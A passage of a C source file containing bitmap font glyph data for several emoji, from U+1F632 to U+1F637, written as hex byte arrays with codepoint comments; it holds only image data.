0x8e, 0x38, 0x80, 0x1, 0xe1, 0xff, 0xc1, 0xe0,
0x0, 0x43, 0xf, 0x0, 0x0, 0x3c, 0x7f, 0xf0,
0xf0, 0x0, 0x1, 0xc1, 0xc0, 0x0, 0x7, 0x1f,
0xfc, 0x38, 0x0, 0x0, 0xe0, 0x38, 0x0, 0x0,
0xe3, 0xfe, 0x1c, 0x0, 0x0, 0x38, 0xe, 0x0,
0x0, 0x38, 0x7f, 0x7, 0x0, 0x0, 0x1c, 0x1,
0xc0, 0x0, 0x7, 0xf, 0x83, 0x80, 0x0, 0xe,
0x0, 0x38, 0x0, 0x1, 0xc0, 0x0, 0xe0, 0x0,
0x3, 0x80, 0xf, 0x0, 0x0, 0x70, 0x0, 0x38,
0x0, 0x1, 0xc0, 0x1, 0xe0, 0x0, 0x1c, 0x0,
0xe, 0x0, 0x0, 0xe0, 0x0, 0x3c, 0x0, 0x7,
0x0, 0x3, 0x80, 0x0, 0xf0, 0x0, 0x3, 0x80,
0x3, 0xe0, 0x1, 0xf0, 0x0, 0x78, 0x0, 0x0,
0x78, 0x1, 0xff, 0xff, 0xfe, 0x0, 0x78, 0x0,
0x0, 0xf, 0x81, 0xff, 0xff, 0xff, 0xe0, 0x7c,
0x0, 0x0, 0x0, 0xff, 0xf0, 0x3f, 0xe0, 0x3f,
0xfc, 0x0, 0x0, 0x0, 0x7, 0xf0, 0x0, 0x0,
0x3, 0xf8, 0x0, 0x0,
/* U+1F632 "😲" */
0x0, 0x0, 0x0, 0x1f, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xff, 0xff, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xf8, 0x0, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x7, 0xc0, 0x0, 0x7, 0xc0, 0x0,
0x0, 0x0, 0xf, 0x80, 0x0, 0x0, 0xf8, 0x0,
0x0, 0x0, 0x1f, 0x0, 0x0, 0x0, 0x1f, 0x0,
0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x3, 0xc0,
0x0, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x70,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1e,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x7,
0x80, 0x0, 0x3c, 0x7, 0xc0, 0x0, 0x1f, 0x1,
0xe0, 0x0, 0x3c, 0x1f, 0xe0, 0x0, 0xf, 0xf0,
0x70, 0x0, 0x1c, 0x3f, 0x0, 0x0, 0x0, 0x3e,
0x1c, 0x0, 0x1c, 0x7c, 0x0, 0x0, 0x0, 0x7,
0xc7, 0x0, 0x1e, 0x38, 0x0, 0x0, 0x0, 0x0,
0xe3, 0xc0, 0xe, 0x8, 0x0, 0x0, 0x0, 0x0,
0x20, 0xe0, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x38, 0xf, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1c, 0x7, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0x3, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x3, 0x83, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe1, 0xc0, 0x0, 0x78, 0x0, 0x1,
0xc0, 0x0, 0x71, 0xc0, 0x0, 0x7e, 0x0, 0x3,
0xf0, 0x0, 0x3c, 0xe0, 0x0, 0x3f, 0x0, 0x1,
0xfc, 0x0, 0xe, 0x70, 0x0, 0x3f, 0xc0, 0x0,
0xfe, 0x0, 0x7, 0x38, 0x0, 0x1f, 0xe0, 0x0,
0xff, 0x0, 0x3, 0xb8, 0x0, 0xf, 0xf0, 0x0,
0x7f, 0x80, 0x0, 0xfc, 0x0, 0x7, 0xf8, 0x0,
0x3f, 0xc0, 0x0, 0x7e, 0x0, 0x3, 0xfc, 0x0,
0xf, 0xe0, 0x0, 0x3f, 0x0, 0x0, 0xfc, 0x0,
0x7, 0xf0, 0x0, 0x1f, 0x80, 0x0, 0x7e, 0x0,
0x3, 0xf0, 0x0, 0xf, 0xc0, 0x0, 0x1e, 0x0,
0x0, 0x70, 0x0, 0x7, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0xf0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1, 0xf8, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7e, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3f, 0x0, 0x0, 0x0,
0x1f, 0x0, 0x0, 0x0, 0x3d, 0xc0, 0x0, 0x0,
0x1f, 0xe0, 0x0, 0x0, 0x1c, 0xe0, 0x0, 0x0,
0x1c, 0x38, 0x0, 0x0, 0xe, 0x70, 0x0, 0x0,
0x1c, 0xc, 0x0, 0x0, 0x7, 0x38, 0x0, 0x0,
0xc, 0x7, 0x0, 0x0, 0x7, 0x8e, 0x0, 0x0,
0xe, 0x1, 0x80, 0x0, 0x3, 0x87, 0x0, 0x0,
0x6, 0x0, 0xc0, 0x0, 0x1, 0xc1, 0xc0, 0x0,
0x3, 0xff, 0xe0, 0x0, 0x1, 0xc0, 0xe0, 0x0,
0x1, 0xff, 0xf0, 0x0, 0x0, 0xe0, 0x78, 0x0,
0x0, 0xff, 0xf8, 0x0, 0x0, 0xe0, 0x1c, 0x0,
0x0, 0x7f, 0xfc, 0x0, 0x0, 0x70, 0x7, 0x0,
0x0, 0x3f, 0xfe, 0x0, 0x0, 0x70, 0x3, 0xc0,
0x0, 0x1f, 0xff, 0x0, 0x0, 0x78, 0x0, 0xe0,
0x0, 0xf, 0xff, 0x80, 0x0, 0x38, 0x0, 0x38,
0x0, 0x7, 0xff, 0xc0, 0x0, 0x38, 0x0, 0x1e,
0x0, 0x3, 0xff, 0xe0, 0x0, 0x38, 0x0, 0x7,
0x80, 0x0, 0xff, 0xf0, 0x0, 0x3c, 0x0, 0x1,
0xe0, 0x0, 0x7f, 0xf0, 0x0, 0x3c, 0x0, 0x0,
0x78, 0x0, 0x1f, 0xf8, 0x0, 0x3c, 0x0, 0x0,
0x1e, 0x0, 0x7, 0xf8, 0x0, 0x38, 0x0, 0x0,
0x3, 0xc0, 0x1, 0xf0, 0x0, 0x78, 0x0, 0x0,
0x0, 0xf8, 0x0, 0x0, 0x0, 0xf8, 0x0, 0x0,
0x0, 0x1f, 0x0, 0x0, 0x1, 0xf0, 0x0, 0x0,
0x0, 0x3, 0xe0, 0x0, 0x3, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x7f, 0x0, 0x1f, 0xc0, 0x0, 0x0,
0x0, 0x0, 0xf, 0xff, 0xff, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7f, 0xf8, 0x0, 0x0, 0x0,
/* U+1F633 "😳" */
0x0, 0x0, 0x0, 0x1f, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xff, 0xff, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xf8, 0x0, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x7, 0xc0, 0x0, 0x7, 0xc0, 0x0,
0x0, 0x0, 0xf, 0x80, 0x0, 0x0, 0xf8, 0x0,
0x0, 0x0, 0x1f, 0x0, 0x0, 0x0, 0x1f, 0x0,
0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x3, 0xc0,
0x0, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x70,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1e,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x7,
0x80, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1,
0xe0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x70, 0x0, 0x1c, 0x1f, 0xe0, 0x0, 0x3, 0xfc,
0x1c, 0x0, 0x1c, 0x3f, 0xfc, 0x0, 0x3, 0xff,
0x87, 0x0, 0x1e, 0x8, 0x4, 0x0, 0x1, 0x0,
0xc3, 0xc0, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xe0, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x38, 0xf, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1c, 0x7, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0x3, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x3, 0x83, 0x80, 0x1f, 0x80, 0x0, 0x0,
0xfe, 0x0, 0xe1, 0xc0, 0x3f, 0xf0, 0x0, 0x1,
0xff, 0xc0, 0x71, 0xc0, 0x3c, 0x1c, 0x0, 0x1,
0xe0, 0xf0, 0x3c, 0xe0, 0x38, 0x7, 0x0, 0x1,
0xc0, 0x1c, 0xe, 0x70, 0x38, 0x1, 0xc0, 0x1,
0xc0, 0x7, 0x7, 0x38, 0x18, 0x0, 0x60, 0x0,
0xc0, 0x1, 0x83, 0xb8, 0x1c, 0x0, 0x38, 0x0,
0xe0, 0x0, 0xe0, 0xfc, 0xc, 0x1e, 0xc, 0x0,
0x60, 0xf0, 0x30, 0x7e, 0x6, 0x1f, 0x86, 0x0,
0x30, 0xfc, 0x18, 0x3f, 0x3, 0xf, 0xc3, 0x0,
0x18, 0x7e, 0xc, 0x1f, 0x81, 0x87, 0xe1, 0x80,
0xc, 0x3f, 0x6, 0xf, 0xc0, 0xc3, 0xf0, 0xc0,
0x6, 0x1f, 0x83, 0x7, 0xe0, 0x70, 0xf0, 0xe0,
0x3, 0x87, 0x83, 0x83, 0xf0, 0x18, 0x0, 0x60,
0x0, 0xc0, 0x1, 0x81, 0xf8, 0xe, 0x0, 0x70,
0x0, 0x70, 0x1, 0xc0, 0xfc, 0x3, 0x80, 0x70,
0x0, 0x1c, 0x1, 0xc0, 0x7e, 0x0, 0xe0, 0x70,
0x0, 0x7, 0x83, 0xc0, 0x3f, 0x0, 0x3f, 0xf0,
0x0, 0x1, 0xff, 0xc0, 0x3d, 0xc0, 0x7, 0xe0,
0x0, 0x0, 0x3f, 0x80, 0x1c, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xe, 0x70, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0x38, 0x0, 0x30,
0x0, 0x0, 0x0, 0x20, 0x7, 0x8e, 0x1, 0x99,
0x0, 0x0, 0x3, 0x33, 0x3, 0x87, 0x0, 0x99,
0x80, 0x0, 0x1, 0x99, 0x1, 0xc1, 0xc0, 0xcc,
0x80, 0x0, 0x1, 0x99, 0x81, 0xc0, 0xe0, 0x4c,
0xc0, 0x0, 0x0, 0xcc, 0x80, 0xe0, 0x78, 0x26,
0x40, 0x0, 0x0, 0x4c, 0x40, 0xe0, 0x1c, 0x2,
0x0, 0x0, 0x0, 0x4, 0x0, 0x70, 0x7, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x70, 0x3, 0xc0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x78, 0x0, 0xe0,
0x0, 0x7, 0xff, 0x0, 0x0, 0x38, 0x0, 0x38,
0x0, 0x3, 0xff, 0x80, 0x0, 0x38, 0x0, 0x1e,
0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x7,
0x80, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x1,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x78, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x1e, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x0,
0x3, 0xc0, 0x0, 0x0, 0x0, 0x78, 0x0, 0x0,
0x0, 0xf8, 0x0, 0x0, 0x0, 0xf8, 0x0, 0x0,
0x0, 0x1f, 0x0, 0x0, 0x1, 0xf0, 0x0, 0x0,
0x0, 0x3, 0xe0, 0x0, 0x3, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x7f, 0x0, 0x1f, 0xc0, 0x0, 0x0,
0x0, 0x0, 0xf, 0xff, 0xff, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7f, 0xf8, 0x0, 0x0, 0x0,
/* U+1F634 "😴" */
0x0, 0x0, 0x0, 0x1f, 0xfe, 0x0, 0x0, 0x70,
0x0, 0x0, 0x0, 0xff, 0xff, 0xf0, 0x0, 0x3f,
0xc0, 0x0, 0x3, 0xf8, 0x0, 0xfe, 0x0, 0x3,
0xe0, 0x0, 0x7, 0xc0, 0x0, 0x7, 0x0, 0x0,
0xf0, 0x0, 0xf, 0x80, 0x0, 0x0, 0x0, 0x0,
0xe0, 0x0, 0x1f, 0x0, 0x0, 0x0, 0x0, 0x0,
0xe0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x10, 0x1,
0xe0, 0x0, 0x1c, 0x0, 0x0, 0x0, 0xf, 0xc1,
0xe0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x3, 0xe1,
0xe0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x70,
0xfe, 0x0, 0x3c, 0x0, 0x0, 0xe, 0x0, 0x70,
0x3f, 0x80, 0x3c, 0x0, 0x0, 0x7, 0xe0, 0x70,
0x0, 0xc0, 0x1c, 0x0, 0x0, 0x0, 0x78, 0x70,
0x0, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x38, 0x70,
0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x78, 0x3f,
0x0, 0x0, 0xe, 0x0, 0x0, 0x0, 0x70, 0x1f,
0xc0, 0x60, 0xe, 0x0, 0x0, 0x0, 0x70, 0x0,
0x0, 0x38, 0xf, 0x0, 0x0, 0x0, 0x70, 0x0,
0x0, 0x1c, 0x7, 0x0, 0x0, 0x0, 0x7f, 0x0,
0x0, 0x7, 0x3, 0x80, 0x0, 0x0, 0x3, 0xc0,
0x0, 0x3, 0x83, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe1, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x71, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x38, 0xe0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe, 0x70, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x7, 0x38, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xb8, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1, 0xdc, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7e, 0x0, 0x20, 0x4, 0x0,
0x10, 0x2, 0x0, 0x3f, 0x0, 0x38, 0x7, 0x0,
0x1c, 0x3, 0x80, 0x1f, 0x80, 0xf, 0xf, 0x0,
0x7, 0x87, 0x80, 0xf, 0xc0, 0x3, 0xff, 0x0,
0x1, 0xff, 0x80, 0x7, 0xe0, 0x0, 0x7e, 0x0,
0x0, 0x3f, 0x0, 0x3, 0xf0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1, 0xf8, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7e, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3f, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1d, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1c, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xe, 0x70, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0x38, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3, 0x8e, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3, 0x87, 0x0, 0x0,
0x0, 0xfe, 0x0, 0x0, 0x1, 0xc1, 0xc0, 0x0,
0x1, 0xff, 0xc0, 0x0, 0x1, 0xc0, 0xe0, 0x0,
0x1, 0xff, 0xf0, 0x0, 0x0, 0xe0, 0x78, 0x0,
0x1, 0xff, 0xfc, 0x0, 0x0, 0xe0, 0x1c, 0x0,
0x1, 0xff, 0xff, 0x0, 0x0, 0x70, 0x7, 0x0,
0x0, 0xff, 0xff, 0x80, 0x0, 0x70, 0x3, 0xc0,
0x0, 0x7f, 0xff, 0xc0, 0x0, 0x78, 0x0, 0xe0,
0x0, 0x3f, 0xff, 0xe0, 0x0, 0x38, 0x0, 0x38,
0x0, 0xf, 0xff, 0xe0, 0x0, 0x38, 0x0, 0x1e,
0x0, 0x2, 0x0, 0x0, 0x0, 0x38, 0x0, 0x7,
0x80, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x1,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x78, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x1e, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x0,
0x3, 0xc0, 0x0, 0x0, 0x0, 0x78, 0x0, 0x0,
0x0, 0xf8, 0x0, 0x0, 0x0, 0xf8, 0x0, 0x0,
0x0, 0x1f, 0x0, 0x0, 0x1, 0xf0, 0x0, 0x0,
0x0, 0x3, 0xe0, 0x0, 0x3, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x7f, 0x0, 0x1f, 0xc0, 0x0, 0x0,
0x0, 0x0, 0xf, 0xff, 0xff, 0x80, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7f, 0xf8, 0x0, 0x0, 0x0,
/* U+1F635 "😵" */
0x0, 0x0, 0x0, 0x1f, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xff, 0xff, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xf8, 0x0, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x7, 0xc0, 0x0, 0x7, 0xc0, 0x0,
0x0, 0x0, 0xf, 0x80, 0x0, 0x0, 0xf8, 0x0,
0x0, 0x0, 0x1f, 0x0, 0x0, 0x0, 0x1f, 0x0,
0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x3, 0xc0,
0x0, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x70,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1e,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x7,
0x80, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1,
0xe0, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x70, 0x0, 0x1c, 0x1, 0xf0, 0x0, 0x7, 0xc0,
0x1c, 0x0, 0x1c, 0x7, 0xf8, 0x0, 0x3, 0xfc,
0x7, 0x0, 0x1e, 0xf, 0xc0, 0x0, 0x0, 0x1f,
0x83, 0xc0, 0xe, 0xf, 0x0, 0x0, 0x0, 0x1,
0xe0, 0xe0, 0xe, 0x6, 0x0, 0x0, 0x0, 0x0,
0x30, 0x38, 0xf, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1c, 0x7, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0x3, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x3, 0x83, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe1, 0xc0, 0x0, 0x3, 0x0, 0x18,
0x0, 0x0, 0x71, 0xc0, 0x18, 0x3, 0xc0, 0x1e,
0x0, 0xc0, 0x3c, 0xe0, 0xe, 0x3, 0xc0, 0x7,
0x80, 0xe0, 0xe, 0x70, 0x7, 0xc3, 0xc0, 0x1,
0xe1, 0xf0, 0x7, 0x38, 0x0, 0xf1, 0xc0, 0x0,
0x71, 0xe0, 0x3, 0xb8, 0x0, 0x3d, 0xc0, 0x0,
0x1d, 0xe0, 0x0, 0xfc, 0x0, 0xf, 0xc0, 0x0,
0x7, 0xe0, 0x0, 0x7e, 0x0, 0x1, 0xe0, 0x0,
0x3, 0xc0, 0x0, 0x3f, 0x0, 0x1, 0xfc, 0x0,
0x7, 0xf0, 0x0, 0x1f, 0x80, 0x1, 0xef, 0x0,
0x7, 0xbc, 0x0, 0xf, 0xc0, 0x1, 0xe3, 0xc0,
0x7, 0x8f, 0x0, 0x7, 0xe0, 0x1, 0xe0, 0xf8,
0xf, 0x83, 0xc0, 0x3, 0xf0, 0x0, 0xe0, 0x18,
0x3, 0x0, 0xe0, 0x1, 0xf8, 0x0, 0xe0, 0x4,
0x1, 0x0, 0x38, 0x0, 0xfc, 0x0, 0x20, 0x0,
0x0, 0x0, 0x8, 0x0, 0x7e, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3f, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3d, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1c, 0xe0, 0x0, 0x0,
0xf, 0xe0, 0x0, 0x0, 0xe, 0x70, 0x0, 0x0,
0x1f, 0xfc, 0x0, 0x0, 0x7, 0x38, 0x0, 0x0,
0x1f, 0xff, 0x0, 0x0, 0x7, 0x8e, 0x0, 0x0,
0x1f, 0xff, 0xc0, 0x0, 0x3, 0x87, 0x0, 0x0,
0x1f, 0xff, 0xf0, 0x0, 0x1, 0xc1, 0xc0, 0x0,
0x1f, 0xff, 0xf8, 0x0, 0x1, 0xc0, 0xe0, 0x0,
0xf, 0xff, 0xfe, 0x0, 0x0, 0xe0, 0x78, 0x0,
0x7, 0xff, 0xff, 0x0, 0x0, 0xe0, 0x1c, 0x0,
0x3, 0xff, 0xff, 0x80, 0x0, 0x70, 0x7, 0x0,
0x1, 0xff, 0xff, 0xc0, 0x0, 0x70, 0x3, 0xc0,
0x0, 0x7f, 0xff, 0xc0, 0x0, 0x78, 0x0, 0xe0,
0x0, 0x1f, 0xff, 0xc0, 0x0, 0x38, 0x0, 0x38,
0x0, 0x7, 0xff, 0xc0, 0x0, 0x38, 0x0, 0xe,
0x0, 0x0, 0xff, 0x80, 0x0, 0x38, 0x0, 0x7,
0x80, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x1,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x78, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0xe, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x0,
0x3, 0xc0, 0x0, 0x0, 0x0, 0x78, 0x0, 0x0,
0x0, 0xf8, 0x0, 0x0, 0x0, 0xf8, 0x0, 0x0,
0x0, 0x1f, 0x0, 0x0, 0x1, 0xf0, 0x0, 0x0,
0x0, 0x3, 0xe0, 0x0, 0x3, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x7f, 0x0, 0x1f, 0xc0, 0x0, 0x0,
0x0, 0x0, 0xf, 0xff, 0xff, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7f, 0xfc, 0x0, 0x0, 0x0,
/* U+1F636 "😶" */
0x0, 0x0, 0x0, 0x1f, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xff, 0xff, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xf8, 0x0, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x7, 0xc0, 0x0, 0x7, 0xc0, 0x0,
0x0, 0x0, 0xf, 0x80, 0x0, 0x0, 0xf8, 0x0,
0x0, 0x0, 0x1f, 0x0, 0x0, 0x0, 0x1f, 0x0,
0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x3, 0xc0,
0x0, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x70,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1e,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x7,
0x80, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1,
0xe0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x70, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1c, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3, 0xc0, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xe0, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x38, 0xf, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1c, 0x7, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0x3, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x3, 0x83, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe1, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x71, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3c, 0xe0, 0x0, 0x1e, 0x0, 0x0,
0x78, 0x0, 0xe, 0x70, 0x0, 0x1f, 0x80, 0x0,
0x7e, 0x0, 0x7, 0x38, 0x0, 0x1f, 0xe0, 0x0,
0x7f, 0x80, 0x3, 0xb8, 0x0, 0xf, 0xf0, 0x0,
0x3f, 0xc0, 0x0, 0xfc, 0x0, 0x7, 0xf8, 0x0,
0x1f, 0xe0, 0x0, 0x7e, 0x0, 0x3, 0xfc, 0x0,
0xf, 0xf0, 0x0, 0x3f, 0x0, 0x1, 0xfe, 0x0,
0x7, 0xf8, 0x0, 0x1f, 0x80, 0x0, 0x7e, 0x0,
0x1, 0xf8, 0x0, 0xf, 0xc0, 0x0, 0x1e, 0x0,
0x0, 0x78, 0x0, 0x7, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0xf0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1, 0xf8, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7e, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3f, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3d, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1c, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xe, 0x70, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0x38, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0x8e, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3, 0x87, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1, 0xc1, 0xc0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1, 0xc0, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xe0, 0x78, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xe0, 0x1c, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x70, 0x7, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x70, 0x3, 0xc0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x78, 0x0, 0xe0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x38,
0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x1e,
0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x7,
0x80, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x1,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x78, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x1e, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x0,
0x3, 0xc0, 0x0, 0x0, 0x0, 0x78, 0x0, 0x0,
0x0, 0xf8, 0x0, 0x0, 0x0, 0xf8, 0x0, 0x0,
0x0, 0x1f, 0x0, 0x0, 0x1, 0xf0, 0x0, 0x0,
0x0, 0x3, 0xe0, 0x0, 0x3, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x7f, 0x0, 0x1f, 0xc0, 0x0, 0x0,
0x0, 0x0, 0xf, 0xff, 0xff, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7f, 0xf8, 0x0, 0x0, 0x0,
/* U+1F637 "😷" */
0x0, 0x0, 0x0, 0x1f, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xff, 0xff, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xf8, 0x0, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x7, 0xc0, 0x0, 0x7, 0xc0, 0x0,
0x0, 0x0, 0xf, 0x80, 0x0, 0x0, 0xf8, 0x0,
0x0, 0x0, 0x1f, 0x0, 0x0, 0x0, 0x1f, 0x0,
0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x3, 0xc0,
0x0, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x70,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1e,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x7,
0x80, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1,
0xe0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x70, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1c, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
